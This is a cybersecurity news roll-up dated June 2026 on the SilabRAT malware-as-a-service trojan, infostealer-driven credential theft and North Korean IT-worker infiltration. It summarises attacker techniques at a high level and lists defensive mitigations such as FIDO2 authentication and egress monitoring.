Full Report
It's been one of those weeks. You expect the usual noise: recycled malware, sloppy attacks, another easy target getting hit. Instead, there's a supply chain attack kit in a public repo, a $5,000-a-month RAT that clones browsers, and research showing AI agents can be tricked into leaking real credentials. The bigger problem is how polished this all looks now. Mule networks run like SaaS.
Analysis Summary
# Morning News Roll-up June 11, 2026
## Overview
This week's threat landscape highlights a shift toward highly polished, "as-a-service" cybercrime models. Key developments include the massive scale of infostealer-driven identity theft, the emergence of advanced browser-cloning RATs, and the dominance of North Korean infiltration campaigns targeting the technology sector.
## Top Stories
### MaaS RAT "SilabRAT" Targets Financial Credentials via Browser Cloning
- Summary: A new advanced Remote Access Trojan (RAT) named SilabRAT is being sold for $5,000/month. It uses Hijack Loader and "ClickFix" campaigns to steal credentials. Its most notable feature is Browser Profile Cloning, which replicates a victim's entire digital fingerprint (cookies, extensions, and storage) to bypass security.
- Source: hxxps://thehackernews[.]com/2026/06/threatsday-bulletin-worm-code-leaked-ai.html#maas-rat-targets-credentials
### Infostealer Ecosystem Fuels 3.3 Billion Record Exposure
- Summary: Flashpoint research reveals that over 11.1 million devices were infected by infostealers in the past year. This has created a massive supply of 3.3 billion stolen credentials and session tokens circulating on illicit markets, powered by at least 30 unique malware strains like Lumma and Rhadamanthys.
- Source: hxxps://thehackernews[.]com/2026/06/threatsday-bulletin-worm-code-leaked-ai.html#3-3b-identity-records-exposed
### North Korean "Famous Chollima" Dominates Tech Sector Intrusions
- Summary: CrowdStrike reports that the North Korean actor Famous Chollima is responsible for nearly 50% of all state-sponsored "hands-on-keyboard" attacks against the tech industry. These campaigns involve fraudulent IT workers seeking employment to gain internal access to corporate networks.
- Source: hxxps://thehackernews[.]com/2026/06/threatsday-bulletin-worm-code-leaked-ai.html#47-of-tech-intrusions
---
# SilabRAT & Identity-Based Malware-as-a-Service
Advanced financial-theft campaigns utilizing sophisticated remote access tools and widespread infostealer deployment.
## Key Points
- **Sophisticated Tooling**: SilabRAT features Hidden Virtual Network Computing (HVNC) and **Browser Profile Cloning**.
- **Commercialization**: The malware is sold as a premium service for $5,000 per month, reflecting a professionalized "SaaS" model for cybercrime.
- **Scale of Theft**: Use of infostealers (Lumma, StealC, etc.) has resulted in billions of leaked session cookies and cloud tokens, which are more valuable than passwords for bypassing MFA.
- **AI & Deepfakes**: Emerging threats include AI agents being tricked into leaking credentials and deepfake KYC (Know Your Customer) bypasses sold as features.
## Threat Actors
- **o1oo1**: A Russian-speaking developer and vendor active since 2020; previously associated with AsmCrypt.
- **Famous Chollima**: North Korean group focused on tech sector infiltration and fraudulent employment.
- **Infostealer Operators**: High activity noted in India, Brazil, Indonesia, and the U.S.
## TTPs
- **Browser Profile Cloning**: Copying user agents, extensions, and local storage to mimic a trusted device.
- **ClickFix Campaigns**: Deceptive prompts (e.g., "Fix your browser") used to deliver Hijack Loader.
- **Hands-on-Keyboard**: Manual interaction with victim systems once initial access is gained.
- **EDR Weakening**: Exploiting built-in OS settings to disable endpoint protection without needing a software exploit.
- **Mule Networks**: Organized money laundering operations running with SaaS-like efficiency.
## Affected Systems
- **Web Browsers**: Specifically targeted for profile cloning and credential extraction.
- **Cryptocurrency Wallets**: Identification of wallet addresses and artifact extraction.
- **Technology Companies**: Primary targets for North Korean infiltration and IT worker fraud.
- **Identity Platforms**: Massive exposure of session cookies and cloud identity tokens.
## Mitigations
- **Hardware-Backed MFA**: Move away from SMS or app-based codes toward FIDO2/WebAuthn to combat session cookie theft.
- **Identity Verification**: Enhanced background checks for remote IT hires to counter North Korean infiltration.
- **Endpoint Hardening**: Restrict administrative rights to prevent the "quiet weakening" of security tools via OS settings.
- **Egress Monitoring**: Detect anomalies in browser profile synchronization and unusual credential access.
## Conclusion
The threat landscape has evolved into a highly polished ecosystem where identity—not just the password—is the primary target. The prevalence of "MaaS" indicates that even mid-tier attackers now have access to elite-level tools capable of cloning entire browser environments. Organizations must shift focus toward securing the identity lifecycle and hardening endpoint configurations against manual tampering.